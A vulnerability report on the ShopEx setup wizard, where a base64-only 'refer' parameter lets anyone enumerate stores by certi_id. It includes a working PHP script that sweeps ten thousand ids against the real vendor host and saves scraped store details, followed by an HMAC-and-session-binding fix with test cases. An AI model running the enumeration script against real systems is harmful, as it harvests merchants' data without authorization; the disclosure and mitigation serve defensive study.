Brief description:
A defect in one ShopEx interface allows every website running ShopEx to be enumerated.

Detailed description:
The problem is in the ShopEx online-store setup wizard page:

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

Base64-decoding the refer parameter gives {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

By changing certi_id we can walk through every website that uses the ShopEx software:
<?php

for ($i = 1; $i < 10000; $i++) { // enumerate certi_id values
    ShowshopExD($i);
}

function ShowshopExD($cid) {
    $url = 'http://guide.ecos.shopex.cn/step2.php';
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url . '?refer=' . urlencode($refer); // base64 may contain '+', '/' and '='

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    $result = curl_exec($ch);
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    if (strpos($result, $refer) !== false) { // the page echoes a valid refer back
        $fp = fopen("c:/shopEx.txt", 'ab'); // save results to a file
        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $key) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($key), $res);
            echo $res[1][0] . ':' . $res[3][0] . "\r\n";
            $col = $res[1][0] . ':' . $res[3][0] . "\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------' . "\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
Proof of vulnerability:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg

Switch refer to a different encryption scheme.
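The suggestion above is to change how refer is encoded. As an added example (not ShopEx's code), the PHP below shows the mitigation a defender would actually want: sign the token with a server-side HMAC so certi_id cannot be swapped by the client, and then still check that the certi_id belongs to the store bound to the caller's session, because any reversible encoding on its own only hides the parameter. REFER_SECRET, issueRefer, parseRefer, authorizeWizard and the session lookup are assumptions, not ShopEx APIs; the ids and URLs are constructed.

```php
<?php
// Added example, not ShopEx code: the wizard's refer token is HMAC-signed
// so certi_id cannot be swapped client-side, and the id is still checked
// against the caller's session. All names here are assumptions.

const REFER_SECRET = 'REPLACE_WITH_LONG_RANDOM_SERVER_SECRET'; // placeholder

// Issued server-side when a logged-in merchant is sent to the wizard.
function issueRefer(int $certiId, string $callbackUrl): string {
    $payload = json_encode(['certi_id' => $certiId, 'callback_url' => $callbackUrl]);
    $sig = hash_hmac('sha256', $payload, REFER_SECRET);
    // URL-safe base64: '+' and '/' would otherwise be mangled in the query string.
    return rtrim(strtr(base64_encode($payload . '.' . $sig), '+/', '-_'), '=');
}

// Verifies the signature before any of the token's contents are trusted.
function parseRefer(string $token): ?array {
    $raw = base64_decode(strtr($token, '-_', '+/'), true);
    if ($raw === false) {
        return null;
    }
    // The hex signature contains no '.', so the last '.' separates it from the JSON payload.
    $dot = strrpos($raw, '.');
    if ($dot === false) {
        return null;
    }
    $payload = substr($raw, 0, $dot);
    $sig = substr($raw, $dot + 1);
    $expected = hash_hmac('sha256', $payload, REFER_SECRET);
    if (!hash_equals($expected, $sig)) {
        return null; // forged or tampered token
    }
    $data = json_decode($payload, true);
    if (!is_array($data) || !isset($data['certi_id'])) {
        return null;
    }
    return $data;
}

// Authorization on top of integrity: the certi_id must be the store bound to
// the caller's session ($sessionCertiId stands in for the real session lookup).
function authorizeWizard(string $token, ?int $sessionCertiId): ?int {
    $data = parseRefer($token);
    if ($data === null || $sessionCertiId === null) {
        return null;
    }
    if ((int)$data['certi_id'] !== $sessionCertiId) {
        return null; // genuine token, but not this merchant's store
    }
    return (int)$data['certi_id'];
}

// Demonstration with constructed values (ids and URLs are made up).
$token = issueRefer(1051, 'http://www.joyogame.net/');
var_dump(authorizeWizard($token, 1051));   // case 1: token issued for the session's own store

// Case 2: client-side id swap without the secret, so the signature cannot match.
$forgedPayload = json_encode(['certi_id' => 1052, 'callback_url' => 'http://www.a.com/']);
$forged = rtrim(strtr(base64_encode($forgedPayload . '.' . str_repeat('0', 64)), '+/', '-_'), '=');
var_dump(authorizeWizard($forged, 1052));

// Case 3: genuine token presented from a different merchant's session.
var_dump(authorizeWizard($token, 1052));
```

Only case 1 yields a certi_id; cases 2 and 3 return null, the first on the HMAC check and the second on the session binding. The second check is the one that closes the enumeration described in this report: even a correctly signed token is useless for reading another store's details, so the wizard no longer acts as an oracle over certi_id.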